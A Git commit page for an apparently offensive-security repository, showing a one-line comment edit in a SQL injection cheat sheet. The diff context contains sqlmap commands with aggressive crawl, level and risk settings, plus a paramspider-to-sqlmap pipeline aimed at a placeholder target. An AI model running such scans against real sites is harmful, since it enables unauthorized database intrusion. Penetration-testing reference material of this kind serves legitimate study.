vos9/Web_Hacking
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Update SQL Injection.md

Browse Source
This commit is contained in:
Mehdi 2024-06-13 13:02:50 +03:30 committed by GitHub
parent ae0bf90e32
commit a8a30403a9
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 1 additions and 1 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
SQL Injection.md
View File

@ -2563,7 +2563,7 @@ sqlmap -u target.com/test?id=10 -p id --random-agent --dbs
# sqlmap is test all forms in target and answered the wizard questios to default # sqlmap is test all forms in target and answered the wizard questios to default
sqlmap -u target.com --forms --batch --crawl=10 --threads=10 --level=5 --risk=3 sqlmap -u target.com --forms --batch --crawl=10 --threads=10 --level=5 --risk=3
# find all parameters on target and send to sqlmap # find all parameters on target domain and subdomain and send to sqlmap
python3 paramspider.py -d target.com -s TRUE -e woff,ttf,eot,svg | deduplicate --sort | sed '1,4d' | sqlmap python3 paramspider.py -d target.com -s TRUE -e woff,ttf,eot,svg | deduplicate --sort | sed '1,4d' | sqlmap
# you can use sqlmap + burp --> burp extension sqlipy (integrated by sqlmap) # you can use sqlmap + burp --> burp extension sqlipy (integrated by sqlmap)